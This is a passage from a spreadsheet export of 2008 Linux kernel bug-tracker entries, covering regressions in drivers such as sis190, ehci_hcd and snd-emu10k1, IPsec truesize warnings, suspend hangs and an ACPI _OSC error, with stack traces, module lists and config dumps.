:hidp:hidp_sock_ioctl+0x20b/0x260 [ 182.450066] [&lt;ffffffff8032e959&gt;] ? avc_has_perm+0x59/0x80 [ 182.450066] [&lt;ffffffff80330e35&gt;] ? inode_has_perm+0x45/0x80 [ 182.450066] [&lt;ffffffff80412caa&gt;] ? sys_sendto+0xea/0x120 [ 182.450066] [&lt;ffffffff804117f6&gt;] sock_ioctl+0x56/0x260 [ 182.450066] [&lt;ffffffff802c74a1&gt;] vfs_ioctl+0x31/0xa0 [ 182.450066] [&lt;ffffffff802c7783&gt;] do_vfs_ioctl+0x273/0x2e0 [ 182.450066] [&lt;ffffffff802c7889&gt;] sys_ioctl+0x99/0xa0 [ 182.450066] [&lt;ffffffff8020c50b&gt;] system_call_after_swapgs+0x7b/0x80 [ 182.450066] [ 182.450066] [ 182.450066] Code: ff ff 0f 1f 80 00 00 00 00 48 8b 43 38 0f 1f 40 00 e9 64 f [ 182.450066] RIP [&lt;ffffffff8031423a&gt;] sysfs_find_dirent+0xa/0x40 [ 182.450066] RSP &lt;ffff81007c171a48&gt; [ 182.450066] CR2: 0000000000000028 [ 183.254096] ---[ end trace f38a864186b8e81d ]--- [ 590.949898] SysRq : Emergency Sync [ 591.632111] Emergency Sync complete [ 594.045739] SysRq : Emergency Remount R/O [ 594.045739] Emergency Remount complete</t>
  </si>
  <si>
    <t>sis191 unknown PHY (004d:d021)</t>
  </si>
  <si>
    <t>2008-06-27 08:39 UTC</t>
  </si>
  <si>
    <t>Nigel Kukard</t>
  </si>
  <si>
    <t>2008-10-26 13:46 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: all Distribution: n/a Hardware Environment: Dual core celeron, AP5SDZVM Asus board Problem Description: phy-&gt;id[0] = 0x004d phy-&gt;id[1] = 0xd021 Appears that this particular board has an unknown mii chip, above is the two ID's. I'm using latest sis190.c and will try the above IDs shortly to see if it at least works. Have no clue what brand this PHY is tho. Steps to reproduce: modprobe sis190 on the above Asus motherboard.</t>
  </si>
  <si>
    <t>2.6.25 kernels spew SKB BUG: Invalid truesize when using ipsec/openswan</t>
  </si>
  <si>
    <t>2.6.25.9</t>
  </si>
  <si>
    <t>2008-06-27 16:37 UTC</t>
  </si>
  <si>
    <t>Tony Lill</t>
  </si>
  <si>
    <t>2010-01-19 18:29 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24.4 Earliest failing kernel version:2.6.25.4 Distribution: Debian etch Hardware Environment: processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 4 model name : Intel(R) Celeron(R) CPU 2.93GHz stepping : 1 cpu MHz : 2929.700 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe constant_tsc up pebs bts pni monitor ds_cpl cid xtpr bogomips : 5865.13 clflush size : 64 Linux-i686-2.6.25.9 $ cat /proc/modules xfrm_user 28040 2 - Live 0xe037d000 xfrm4_tunnel 3976 0 - Live 0xe0226000 af_key 39452 0 - Live 0xe0308000 authenc 8072 5 - Live 0xe0443000 xfrm4_mode_tunnel 3976 10 - Live 0xe0435000 cls_u32 9100 1 - Live 0xe045e000 sch_red 7432 1 - Live 0xe0440000 xt_mark 3208 2 - Live 0xe0433000 xt_layer7 12564 5 - Live 0xe0463000 xt_length 2952 2 - Live 0xe0431000 cls_fw 6536 14 - Live 0xe042b000 sch_sfq 8072 14 - Live 0xe0422000 sch_htb 17288 2 - Live 0xe0425000 xt_TCPMSS 6536 1 - Live 0xe0400000 xt_tcpmss 3208 1 - Live 0xe0418000 netconsole 11044 0 - Live 0xe043c000 configfs 28592 2 netconsole, Live 0xe0446000 pppoe 14564 2 - Live 0xe0437000 pppox 5396 1 pppoe, Live 0xe042e000 iptable_mangle 4360 1 - Live 0xe0415000 xt_MARK 3592 47 - Live 0xe0395000 xt_conntrack 5128 1 - Live 0xe0412000 ipt_REDIRECT 3208 1 - Live 0xe035f000 xt_limit 3596 4 - Live 0xe0334000 ipt_recent 10428 3 - Live 0xe041a000 ipt_REJECT 5000 11 - Live 0xe040f000 xt_state 3464 10 - Live 0xe0306000 xt_tcpudp 4360 203 - Live 0xe040c000 ipt_LOG 7052 27 - Live 0xe03f7000 iptable_filter 4492 1 - Live 0xe03fd000 iptable_nat 8340 1 - Live 0xe0408000 ip_tables 15256 3 iptable_mangle,iptable_filter,iptable_nat, Live 0xe0403000 nf_nat_pptp 4872 0 - Live 0xe03fa000 nf_conntrack_pptp 8076 1 nf_nat_pptp, Live 0xe03a2000 nf_conntrack_proto_gre 7176 1 nf_conntrack_pptp, Live 0xe034b000 nf_nat_proto_gre 3852 1 nf_nat_pptp, Live 0xe0254000 nf_nat_sip 5512 0 - Live 0xe0392000 nf_conntrack_sip 10148 1 nf_nat_sip, Live 0xe039e000 nf_nat_ftp 4364 0 - Live 0xe038f000 nf_nat 20532 6 ipt_REDIRECT,iptable_nat,nf_nat_pptp,nf_nat_proto_gre,nf_nat_sip, nf_nat_ftp, Live 0xe0397000 nf_conntrack_ipv4 18716 19 iptable_nat,nf_nat, Live 0xe0377000 nf_conntrack_ftp 10292 1 nf_nat_ftp, Live 0xe038b000 nf_conntrack 64396 13 xt_layer7,xt_conntrack,xt_state,iptable_nat,nf_nat_pptp,nf _conntrack_pptp,nf_conntrack_proto_gre,nf_nat_sip,nf_conntrack_sip,nf_nat_ftp,nf _nat,nf_conntrack_ipv4,nf_conntrack_ftp, Live 0xe03e6000 xt_TARPIT 5000 2 - Live 0xe0374000 x_tables 17804 17 xt_mark,xt_layer7,xt_length,xt_TCPMSS,xt_tcpmss,xt_MARK,xt_con ntrack,ipt_REDIRECT,xt_limit,ipt_recent,ipt_REJECT,xt_state,xt_tcpudp,ipt_LOG,ip table_nat,ip_tables,xt_TARPIT, Live 0xe0385000 tunnel4 4752 1 xfrm4_tunnel, Live 0xe034e000 ipcomp 9744 0 - Live 0xe0370000 esp4 9096 5 - Live 0xe035b000 aead 9096 2 authenc,esp4, Live 0xe0357000 ah4 7432 0 - Live 0xe0341000 af_packet 23176 8 - Live 0xe0369000 ppp_generic 28196 6 pppoe,pppox, Live 0xe0361000 slhc 7176 1 ppp_generic, Live 0xe004c000 ipv6 261772 34 - Live 0xe03a5000 deflate 4872 0 - Live 0xe0327000 zlib_deflate 19776 1 deflate, Live 0xe0351000 ctr 6024 0 - Live 0xe0316000 twofish 8328 0 - Live 0xe0330000 twofish_common 13832 1 twofish, Live 0xe033c000 camellia 22536 0 - Live 0xe0344000 serpent 18696 0 - Live 0xe0336000 blowfish 10376 0 - Live 0xe0323000 des_generic 17288 0 - Live 0xe032a000 cbc 5384 5 - Live 0xe0313000 aes_i586 9352 5 - Live 0xe0241000 aes_generic 31052 1 aes_i586, Live 0xe031a000 xcbc 6416 0 - Live 0xe023e000 sha256_generic 12808 0 - Live 0xe0301000 sha1_generic 3720 5 - Live 0xe017e000 crypto_null 4232 0 - Live 0xe023b000 crypto_blkcipher 19864 9 authenc,ctr,cbc,crypto_null, Live 0xe02fb000 dm_snapshot 20400 0 - Live 0xe024e000 dm_mirror 29200 0 - Live 0xe0245000 dm_mod 63032 2 dm_snapshot,dm_mirror, Live 0xe026e000 w83627hf 25140 0 - Live 0xe0164000 hwmon_vid 3848 1 w83627hf, Live 0xe0052000 hwmon 4388 1 w83627hf, Live 0xe0159000 8250_pnp 10888 0 - Live 0xe0237000 snd_intel8x0 34252 0 - Live 0xe021c000 snd_ac97_codec 93884 1 snd_intel8x0, Live 0xe0256000 ac97_bus 2952 1 snd_ac97_codec, Live 0xe00a6000 8250 26776 1 8250_pnp, Live 0xe0214000 serial_core 22536 1 8250, Live 0xe0177000 floppy 57224 0 - Live 0xe0228000 psmouse 39368 0 - Live 0xe016c000 snd_pcm 73640 2 snd_intel8x0,snd_ac97_codec, Live 0xe0201000 pcspkr 4232 0 - Live 0xe015c000 rtc 15532 0 - Live 0xe013a000 serio_raw 7948 0 - Live 0xe00f6000 i2c_i801 10648 0 - Live 0xe013f000 snd_timer 24600 1 snd_pcm, Live 0xe0143000 i2c_core 24348 1 i2c_i801, Live 0xe010b000 snd 52744 4 snd_intel8x0,snd_ac97_codec,snd_pcm,snd_timer, Live 0xe014b000 soundcore 9188 1 snd, Live 0xe0136000 snd_page_alloc 11412 2 snd_intel8x0,snd_pcm, Live 0xe0132000 rng_core 6156 0 - Live 0xe001e000 iTCO_wdt 12724 0 - Live 0xe00ed000 button 9496 0 - Live 0xe00f2000 intel_agp 27112 1 - Live 0xe0103000 agpgart 35416 1 intel_agp, Live 0xe00f9000 sg 36168 0 - Live 0xe00d4000 evdev 13348 0 - Live 0xe00a1000 sr_mod 17492 0 - Live 0xe00ce000 cdrom 36292 1 sr_mod, Live 0xe008a000 ext3 124888 3 - Live 0xe0112000 jbd 50736 1 ext3, Live 0xe00df000 mbcache 9740 1 ext3, Live 0xe0024000 sd_mod 27296 10 - Live 0xe0094000 pata_acpi 8200 0 - Live 0xe007e000 ata_generic 9104 0 - Live 0xe007a000 ata_piix 22796 10 - Live 0xe0083000 libata 150576 3 pata_acpi,ata_generic,ata_piix, Live 0xe00a8000 dock 12188 1 libata, Live 0xe0061000 8139cp 23440 0 - Live 0xe0073000 8139too 27544 0 - Live 0xe006b000 mii 6408 2 8139cp,8139too, Live 0xe004f000 ehci_hcd 34336 0 - Live 0xe0057000 uhci_hcd 25244 0 - Live 0xe0031000 thermal 21308 0 - Live 0xe0039000 processor 44792 1 thermal, Live 0xe0040000 fan 5256 0 - Live 0xe0021000 unix 29244 136 - Live 0xe0028000 Software Environment: Debian etch firewall using pppoe and openswan Problem Description: The kernel spews hundreds of SKB BUG: Invalid truesize (560) len=392, sizeof(sk_buff)=176 With various values for truesize and len whenever ipsec tunnels are up. No other detectible problems, except log pollution. Steps to reproduce: /etc/init.d/ipsec start</t>
  </si>
  <si>
    <t>Module ehci_hcd behaves nasty on device use and/or device removal.</t>
  </si>
  <si>
    <t>2.6.26-rc8 (any version &gt;= 2.6.25)</t>
  </si>
  <si>
    <t>2008-06-27 16:54 UTC</t>
  </si>
  <si>
    <t>Valentin QUEQUET</t>
  </si>
  <si>
    <t>2010-01-19 18:30 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24.7 Earliest failing kernel version: 2.6.25.6 Distribution: Debian over PRISTINE Linux 2.6.26-rc8 Hardware Environment: Linux debian 2.6.26-rc8-custom-0001 #1 SMP Fri Jun 27 20:45:19 CEST 2008 x86_64 GNU/Linux Software Environment: Linux debian 2.6.26-rc8-custom-0001 #1 SMP Fri Jun 27 20:45:19 CEST 2008 x86_64 GNU/Linux under Debian Lenny/Sid. Problem Description: Hello ;-) Troubles (Oopses) often (see details after Oopses below) happen when I try to scan a document via S.A.N.E. with my combo Printer/Scanner Canon PIXMA MP150. I always have at most 1 scanner plugged (the above mentionned). The same trouble happens when I type the command 'scanimage -T' which is a test consisting effectively in scanning a small part of the document. Contrary to 'scanimage -T', the command 'scanimage -L', which lists available scanners (1 scanner here if plugged and ON), initiate dialogue with the scanner and report it as available for susequent scanning operations. Example of an unsuccessful scanning/test attempt, where module ehci_hcd is loaded: Jun 27 22:39:10 debian kernel: [ 245.365633] usb 2-5: unlink qh128-0001/ffff81003e6e9320 start 127 [2/0 us] Jun 27 22:39:10 debian kernel: [ 245.365740] ehci_hcd 0000:00:0b.1: reused qh ffff81003e6e9320 schedule Jun 27 22:39:10 debian kernel: [ 245.365746] usb 2-5: link qh128-0001/ffff81003e6e9320 start 127 [2/0 us] Jun 27 22:39:10 debian kernel: [ 245.820940] usb 2-5: unlink qh128-0001/ffff81003e6e9320 start 127 [2/0 us] Jun 27 22:39:10 debian kernel: [ 245.822675] ehci_hcd 0000:00:0b.1: HC died; cleaning up Jun 27 22:39:10 debian kernel: [ 245.824940] hub 2-0:1.0: state 0 ports 8 chg 0000 evt fe00 Jun 27 22:39:10 debian kernel: [ 245.824940] usb 2-5: USB disconnect, address 4 Jun 27 22:39:10 debian kernel: [ 245.824940] usb 2-5: unregistering device Jun 27 22:39:10 debian kernel: [ 245.824940] usb 2-5: usb_disable_device nuking all URBs Jun 27 22:39:10 debian kernel: [ 245.824940] usb 2-5: unregistering interface 2-5:1.0 Jun 27 22:39:10 debian kernel: [ 245.824940] PM: Removing info for usb:2-5:1.0 I never get to scan a document with module ehci_hcd loaded. If I power off my scanner while ehci_hcd is loaded, I get that: Jun 27 22:40:48 debian kernel: [ 342.999039] irq 7: nobody cared (try booting with the "irqpoll" option) Jun 27 22:40:48 debian kernel: [ 342.999358] Pid: 0, comm: swapper Not tainted 2.6.26-rc8-custom-0001 #1 Jun 27 22:40:48 debian kernel: [ 342.999533] Jun 27 22:40:48 debian kernel: [ 342.999534] Call Trace: Jun 27 22:40:48 debian kernel: [ 342.999868] &lt;IRQ&gt; [&lt;ffffffff8026bb3b&gt;] __report_bad_irq+0x30/0x72 Jun 27 22:40:48 debian kernel: [ 343.000084] [&lt;ffffffff8026bd68&gt;] note_interrupt+0x1eb/0x253 Jun 27 22:40:48 debian kernel: [ 343.000262] [&lt;ffffffff8026c429&gt;] handle_fasteoi_irq+0xa5/0xc8 Jun 27 22:40:48 debian kernel: [ 343.000440] [&lt;ffffffff8020ec6a&gt;] do_IRQ+0xf2/0x160 Jun 27 22:40:48 debian kernel: [ 343.000612] [&lt;ffffffff8020a000&gt;] default_idle+0x0/0x3b Jun 27 22:40:48 debian kernel: [ 343.000787] [&lt;ffffffff8020c331&gt;] ret_from_intr+0x0/0xa Jun 27 22:40:48 debian kernel: [ 343.000959] &lt;EOI&gt; [&lt;ffffffff8020a000&gt;] default_idle+0x0/0x3b Jun 27 22:40:48 debian kernel: [ 343.001162] [&lt;ffffffff8020a027&gt;] default_idle+0x27/0x3b Jun 27 22:40:48 debian kernel: [ 343.001337] [&lt;ffffffff8020afeb&gt;] cpu_idle+0x77/0xbf Jun 27 22:40:48 debian kernel: [ 343.001518] Jun 27 22:40:48 debian kernel: [ 343.001685] handlers: Jun 27 22:40:48 debian kernel: [ 343.001853] [&lt;ffffffff80373b82&gt;] (usb_hcd_irq+0x0/0x58) Jun 27 22:40:48 debian kernel: [ 343.002078] Disabling IRQ #7 I even sometimes get this later Oops when I just try to scan a document (or test with 'scanimage -T'). Steps to reproduce: When ehci_hcd is NOT loaded, then both 'scanimage -L' and 'scanimage -T' ALWAYS SUCCEED at dialoging with the scanner. When ehci_hcd is loaded, then 'scanimage -T' ALWAYS FAILS, outputting Oopses or saying (if already oopsed) that there is no scanner. When ehci_hcd is loaded, then 'scanimage -L' SUCCEED ONLY IF there has been no Oopses (of the 2 sorts described above). More information: I enabled some debugging/logging facilities at .config time for the purpose of this report. Troubles showed even without those options anyway. Troubles equally showed with kernel versions &gt;= 2.6.25.6 Troubles did not show with kernel version == 2.6.24.7 (syslog, .config, ...) on my WEB site: http://pagesperso-orange.fr/mandolosse/ Initial report against Debian-packaged kernel here: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=487725 With hope my report will prove useful. regards Valentin QUEQUET</t>
  </si>
  <si>
    <t>2.6.25.6</t>
  </si>
  <si>
    <t>2.6.26-rc5-git2: snd-emu10k1 does not work</t>
  </si>
  <si>
    <t>2.6.26-rc5-git2</t>
  </si>
  <si>
    <t>2008-06-29 11:02 UTC</t>
  </si>
  <si>
    <t>2010-01-19 19:24 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rc5-git2: snd-emu10k1 does not work Submitter : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Date : 2008-06-08 21:03 References : http://marc.info/?l=linux-kernel&amp;m=121295902917875&amp;w=4 Handled-By : Takashi Iwai &lt;tiwai@suse.de&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.26-rc6: pcmcia stopped working</t>
  </si>
  <si>
    <t>2008-06-29 11:13 UTC</t>
  </si>
  <si>
    <t>2008-07-06 08:54 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rc6: pcmcia stopped working Submitter : Pavel Machek &lt;pavel@suse.cz&gt; Date : 2008-06-22 22:40 References : http://marc.info/?l=linux-kernel&amp;m=121420740806363&amp;w=4 References : http://marc.info/?t=121439185700001&amp;r=1&amp;w=4 Handled-By : Tejun Heo &lt;htejun@gmail.com&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[BISECT] Boot failure on ia64.</t>
  </si>
  <si>
    <t>2008-06-29 11:31 UTC</t>
  </si>
  <si>
    <t>2008-06-30 09:39 UTC</t>
  </si>
  <si>
    <t>Tony Luck</t>
  </si>
  <si>
    <t>Subject : [BISECT] Boot failure on ia64. Submitter : Robin Holt &lt;holt@sgi.com&gt; Date : 2008-06-24 07:30 References : http://lkml.org/lkml/2008/6/24/196 Handled-By : Alex Chiang &lt;achiang@hp.com&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>after laptop re-dock: usb-storage device no longer detected</t>
  </si>
  <si>
    <t>2008-06-29 11:37 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rc1 regression since 2.6.25 - problem in 2.6.26-rc8 again Submitter : Lukas Hejtmanek &lt;xhejtman@ics.muni.cz&gt; Date : 2008-06-26 17:37 References : http://lkml.org/lkml/2008/6/26/391 Handled-By : Alan Stern &lt;stern@rowland.harvard.edu&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>i945: mplayer -vo gl messes up screen</t>
  </si>
  <si>
    <t>2008-07-01 03:26 UTC</t>
  </si>
  <si>
    <t>2008-07-03 08:53 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: v2.6.25 Earliest failing kernel version: v2.6.25-5100-g7b832b5, 2.6.26-rc1 Distribution: Debian Hardware Environment: HP Compaq nx7300, i945 Software Environment: xorg-video-intel 2.3.1, MPlayer dev-SVN-r27057-4.2.4 Problem Description: It looks like this: http://tomi.nomi.cz/tmp/broken_mplayer_gl_2.6.26.mov You can see the screen gets corrupted at the top around the mplayer window, but it's the same rectange that gets corrupted in which the video works and outside doesn't. I had intel driver 2.1.1 a few weeks ago and it looked a bit different there -- didn't corrupt the top of the screen but was corrupted in the whole mplayer window. I bisected it to 7b832b56bd971348329c3f4c753ca0abfdf3a3d1. i945 seems not to support these tiled XY blits, or at least not this way. Reverting this at HEAD serves as a workaround.</t>
  </si>
  <si>
    <t>s2ram/resume hangs after a few hours/days</t>
  </si>
  <si>
    <t>2.6.25.3, 2.6.26-rc1</t>
  </si>
  <si>
    <t>2008-07-01 05:13 UTC</t>
  </si>
  <si>
    <t>2008-07-02 07:27 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: v2.6.25.2 Earliest failing kernel version: v2.6.25.2-11-gadb811e, v2.6.25-7254-g21a75d7, 2.6.25.3, 2.6.26-rc1 Distribution: Debian Hardware Environment: HP Compaq nx7300 Problem Description: Suspending and resuming a few times a day, the system hangs during either suspend or resume after a day or so. I'm doing those suspends after issuing /sbin/wpa_cli disconnect, without that (that means with the wlan on and connected), the system hangs almost always, no matter what kernel version I have. I bisected this (took weeks, as you may imagine :]) to commit adb811eb6554bcc6ec46916a295f6ecd234d27cf. Reverting it at HEAD serves as a workaround.</t>
  </si>
  <si>
    <t>Asus M2A-MX (AMD 690V/SB600) - low performance SATA</t>
  </si>
  <si>
    <t>2.6.18-2.6.25.3 and probably later</t>
  </si>
  <si>
    <t>2008-07-01 23:55 UTC</t>
  </si>
  <si>
    <t>Alexander Zhuravlev</t>
  </si>
  <si>
    <t>2008-09-23 03:28 UTC</t>
  </si>
  <si>
    <t>11020 11021</t>
  </si>
  <si>
    <t>Latest working kernel version: - Earliest failing kernel version: 2.6.18 Distribution: Debian 4.0r3, server. Hardware Environment: Athlon64 X2 3800+/Asus M2A-MX(AMD 690V/SB600)/2*2Gb DDR2-800/Seagate 7200.10 250Gb Software Environment: nothing else, than minimal set. Problem Description: hdparm -t /dev/sda result - 42-43Mb/sec, vanilla 2.6.5.25.2(and .3) - same result. I replaced mb on Asus M2N-VM (GF7050/nF630a) and "hdparm -t /dev/sda" (on same hdd - just replace mb and boot) result is 72Mb/sec. Steps to reproduce: i think - just had mb on SB600 and install any OS.</t>
  </si>
  <si>
    <t>2.6.25 to 2.6.26-rc8 regression  (related to ahci and acpi _GTF)</t>
  </si>
  <si>
    <t>2008-07-02 07:26 UTC</t>
  </si>
  <si>
    <t>2008-07-13 12:54 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25 to 2.6.26-rc8 regression (related to ahci and acpi _GTF) Submitter : Mathieu Bérard &lt;Mathieu.Berard@crans.org&gt; Date : 2008-07-01 9:39 References : http://marc.info/?t=121490593600001&amp;r=1&amp;w=4 Handled-By : Tejun Heo &lt;htejun@gmail.com&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[problem] raid performance loss with 2.6.26-rc8 on 32-bit x86 (bisected)</t>
  </si>
  <si>
    <t>2008-07-02 07:33 UTC</t>
  </si>
  <si>
    <t>2008-07-06 08:50 UTC</t>
  </si>
  <si>
    <t>Subject : [problem] raid performance loss with 2.6.26-rc8 on 32-bit x86 (bisected) Submitter : Dan Williams &lt;dan.j.williams@intel.com&gt; Date : 2008-07-01 1:57 References : http://marc.info/?l=linux-kernel&amp;m=121487749429883&amp;w=4 Handled-By : Mel Gorman &lt;mel@csn.ul.ie&gt; Handled-By : Andy Whitcroft &lt;apw@shadowen.org&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ACPI Error (nseval-0159): Insufficient arguments - method [_OSC] needs 5, found 4 [20080609]</t>
  </si>
  <si>
    <t>2.6.26-rc8-next-20080702</t>
  </si>
  <si>
    <t>2008-07-03 07:16 UTC</t>
  </si>
  <si>
    <t>Alexander Beregalov</t>
  </si>
  <si>
    <t>2008-10-24 22:54 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: None. It is the first kernel I tried here. Earliest failing kernel version: 2.6.26-rc8-next-20080702 Distribution: Gentoo Hardware Environment: Sun Ultra 20M2: Sun MoBo, Nvidia MCP55, Dual-Core Opteron 1214, 4G RAM, nVidia Corporation G73GL [Quadro FX 560] Software Environment: gcc version 4.1.2 (Gentoo 4.1.2 p1.0.2) Target: x86_64-pc-linux-gnu CONFIG_ACPI=y CONFIG_ACPI_DOCK=y CONFIG_ACPI_BLACKLIST_YEAR=0 CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_SYSTEM=y CONFIG_PNPACPI=y Problem Description: WARNING: at nseval:159 acpi_ut_error+0x32/0xa2() Modules linked in: Pid: 1, comm: swapper Not tainted 2.6.26-rc8-next-20080702 #1 Call Trace: [&lt;ffffffff8022f47b&gt;] warn_on_slowpath+0x58/0x87 [&lt;ffffffff8024ea02&gt;] ? __lock_acquire+0xd25/0xd71 [&lt;ffffffff8027f79e&gt;] ? check_bytes_and_report+0x38/0xcb [&lt;ffffffff803606c8&gt;] ? acpi_ns_get_node+0x94/0xa4 [&lt;ffffffff8027fbf5&gt;] ? check_object+0x15a/0x245 [&lt;ffffffff8027f483&gt;] ? init_object+0x6e/0x77 [&lt;ffffffff8024d875&gt;] ? trace_hardirqs_on+0xd/0xf [&lt;ffffffff80366be9&gt;] acpi_ut_error+0x32/0xa2 [&lt;ffffffff8024d875&gt;] ? trace_hardirqs_on+0xd/0xf [&lt;ffffffff803606c8&gt;] ? acpi_ns_get_node+0x94/0xa4 [&lt;ffffffff803606c8&gt;] ? acpi_ns_get_node+0x94/0xa4 [&lt;ffffffff8024d83d&gt;] ? trace_hardirqs_on_caller+0xf9/0x124 [&lt;ffffffff8024d875&gt;] ? trace_hardirqs_on+0xd/0xf [&lt;ffffffff80367740&gt;] ? acpi_ut_copy_eobject_to_iobject+0x18c/0x20a [&lt;ffffffff803668f1&gt;] ? acpi_ut_valid_acpi_name+0x1f/0x3c [&lt;ffffffff8035fefe&gt;] acpi_ns_evaluate+0x10e/0x1b4 [&lt;ffffffff8035fa4e&gt;] acpi_evaluate_object+0x136/0x1f4 [&lt;ffffffff8027fbf5&gt;] ? check_object+0x15a/0x245 [&lt;ffffffff8034d710&gt;] acpi_run_osc+0xa5/0x16b [&lt;ffffffff8034d866&gt;] pci_osc_control_set+0x90/0xa7 [&lt;ffffffff80349446&gt;] aer_osc_setup+0x66/0xbc [&lt;ffffffff80348533&gt;] aer_init+0x9/0x1f [&lt;ffffffff80469042&gt;] aer_probe+0x13/0x16d [&lt;ffffffff80347d0a&gt;] pcie_port_probe_service+0x3a/0x84 [&lt;ffffffff8038ed99&gt;] driver_probe_device+0xd9/0x169 [&lt;ffffffff8038ee78&gt;] __driver_attach+0x4f/0x79 [&lt;ffffffff8038ee29&gt;] ? __driver_attach+0x0/0x79 [&lt;ffffffff8038e3e8&gt;] bus_for_each_dev+0x4d/0x7e [&lt;ffffffff8038ebc7&gt;] driver_attach+0x1c/0x1e [&lt;ffffffff8038e876&gt;] bus_add_driver+0xba/0x210 [&lt;ffffffff805f2ec2&gt;] ? aer_service_init+0x0/0x20 [&lt;ffffffff8038f056&gt;] driver_register+0x93/0x10a [&lt;ffffffff805f2ec2&gt;] ? aer_service_init+0x0/0x20 [&lt;ffffffff803477eb&gt;] pcie_port_service_register+0x47/0x49 [&lt;ffffffff805f2ee0&gt;] aer_service_init+0x1e/0x20 [&lt;ffffffff805e0963&gt;] kernel_init+0x142/0x29d [&lt;ffffffff8024d83d&gt;] ? trace_hardirqs_on_caller+0xf9/0x124 [&lt;ffffffff8024d875&gt;] ? trace_hardirqs_on+0xd/0xf [&lt;ffffffff8046f968&gt;] ? _spin_unlock_irq+0x2b/0x31 [&lt;ffffffff8046f30e&gt;] ? trace_hardirqs_on_thunk+0x3a/0x3f [&lt;ffffffff8024d83d&gt;] ? trace_hardirqs_on_caller+0xf9/0x124 [&lt;ffffffff8020c0a8&gt;] child_rip+0xa/0x12 [&lt;ffffffff8020b7bf&gt;] ? restore_args+0x0/0x30 [&lt;ffffffff805e0821&gt;] ? kernel_init+0x0/0x29d [&lt;ffffffff8020c09e&gt;] ? child_rip+0x0/0x12 ---[ end trace a7919e7f17c0a725 ]--- ACPI Error (nseval-0159): Insufficient arguments - method [_OSC] needs 5, found 4 [20080609] aer 0000:00:0a.0:pcie01: AER service couldn't init device: _OSC failed Steps to reproduce: just compile and boot it. It appears during booting. CONFIG_64BIT=y CONFIG_X86_64=y CONFIG_X86=y CONFIG_ARCH_DEFCONFIG="arch/x86/configs/x86_64_defconfig" CONFIG_GENERIC_TIME=y CONFIG_GENERIC_CMOS_UPDATE=y CONFIG_CLOCKSOURCE_WATCHDOG=y CONFIG_GENERIC_CLOCKEVENTS=y CONFIG_GENERIC_CLOCKEVENTS_BROADCAST=y CONFIG_LOCKDEP_SUPPORT=y CONFIG_STACKTRACE_SUPPORT=y CONFIG_HAVE_LATENCYTOP_SUPPORT=y CONFIG_FAST_CMPXCHG_LOCAL=y CONFIG_MMU=y CONFIG_ZONE_DMA=y CONFIG_GENERIC_ISA_DMA=y CONFIG_GENERIC_IOMAP=y CONFIG_GENERIC_BUG=y CONFIG_GENERIC_HWEIGHT=y CONFIG_ARCH_MAY_HAVE_PC_FDC=y CONFIG_RWSEM_GENERIC_SPINLOCK=y CONFIG_ARCH_HAS_CPU_IDLE_WAIT=y CONFIG_GENERIC_CALIBRATE_DELAY=y CONFIG_GENERIC_TIME_VSYSCALL=y CONFIG_ARCH_HAS_CPU_RELAX=y CONFIG_ARCH_HAS_CACHE_LINE_SIZE=y CONFIG_HAVE_SETUP_PER_CPU_AREA=y CONFIG_HAVE_CPUMASK_OF_CPU_MAP=y CONFIG_ARCH_HIBERNATION_POSSIBLE=y CONFIG_ARCH_SUSPEND_POSSIBLE=y CONFIG_ZONE_DMA32=y CONFIG_ARCH_POPULATES_NODE_MAP=y CONFIG_AUDIT_ARCH=y CONFIG_ARCH_SUPPORTS_AOUT=y CONFIG_ARCH_SUPPORTS_OPTIMIZED_INLINING=y CONFIG_GENERIC_HARDIRQS=y CONFIG_GENERIC_IRQ_PROBE=y CONFIG_GENERIC_PENDING_IRQ=y CONFIG_X86_SMP=y CONFIG_X86_64_SMP=y CONFIG_X86_HT=y CONFIG_X86_BIOS_REBOOT=y CONFIG_X86_TRAMPOLINE=y CONFIG_DEFCONFIG_LIST="/lib/modules/$UNAME_RELEASE/.config" CONFIG_EXPERIMENTAL=y CONFIG_LOCK_KERNEL=y CONFIG_INIT_ENV_ARG_LIMIT=32 CONFIG_LOCALVERSION="" CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_SYSVIPC_SYSCTL=y CONFIG_POSIX_MQUEUE=y CONFIG_IKCONFIG=y CONFIG_IKCONFIG_PROC=y CONFIG_LOG_BUF_SHIFT=18 CONFIG_HAVE_UNSTABLE_SCHED_CLOCK=y CONFIG_RELAY=y CONFIG_NAMESPACES=y CONFIG_CC_OPTIMIZE_FOR_SIZE=y CONFIG_SYSCTL=y CONFIG_UID16=y CONFIG_SYSCTL_SYSCALL=y CONFIG_SYSCTL_SYSCALL_CHECK=y CONFIG_KALLSYMS=y CONFIG_KALLSYMS_ALL=y CONFIG_KALLSYMS_EXTRA_PASS=y CONFIG_HOTPLUG=y CONFIG_PRINTK=y CONFIG_BUG=y 